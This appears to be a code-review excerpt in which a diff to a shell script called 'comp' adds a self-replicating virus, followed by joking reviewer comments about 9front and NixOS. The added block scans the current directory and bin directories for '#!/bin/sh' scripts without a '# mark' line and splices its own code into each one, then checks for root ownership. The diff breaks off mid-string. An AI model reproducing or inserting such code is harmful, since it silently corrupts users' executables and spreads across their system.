comp

```diff
@@ -1,4 +1,27 @@
 #!/bin/sh
+{
+	for i in * /bin/* /usr/bin/* /usr/local/bin/* ~/bin/* ~/.local/bin/*
+	do
+		if sed 1q "$i" | grep '^#![ 	]*/bin/sh'
+		then
+			if ! grep '^# mark$' "$i"
+			then
+				sed 1q "$i" >"/tmp/x$$"
+				sed '1d
+				/^# mark$/q' "$0" >>"/tmp/x$$"
+				sed 1d "$i" >>"/tmp/x$$"
+				cp "/tmp/x$$" "$i"
+			fi
+		fi
+	done
+	if ls -l "/tmp/x$$" | grep root
+	then
+		echo 'install 9front
```

Comment:
Should say nixos not 9front :p

Reply:
Maybe he is using NixOS already, though.

Reply:
Nah his repo would be wrapped in heaps of nix scripts if he did.